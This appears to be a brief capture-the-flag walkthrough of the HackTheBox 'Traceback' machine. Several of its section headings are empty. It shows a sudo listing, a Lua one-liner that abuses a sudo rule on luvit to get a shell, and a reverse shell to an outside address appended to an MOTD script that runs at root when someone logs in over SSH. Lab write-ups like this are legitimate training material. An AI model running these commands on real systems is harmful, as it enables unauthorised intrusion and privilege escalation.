HackTheBox — Traceback

Summary

Enumeration

Nmap

Web Enum

$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
echo "local t = os.execute('/bin/sh')" > rev.lua
sudo -u sysadmin /home/sysadmin/luvit rev.lua

Privilege Escalation

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/4334 0>&1'" >> /etc/update-motd.d/00-header
root@strike:~# ssh -i id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

8c221146c17c2a973a846f49xxxxxxxx


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Aug 15 06:23:37 2020 from 10.10.14.53
webadmin@traceback:~$

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store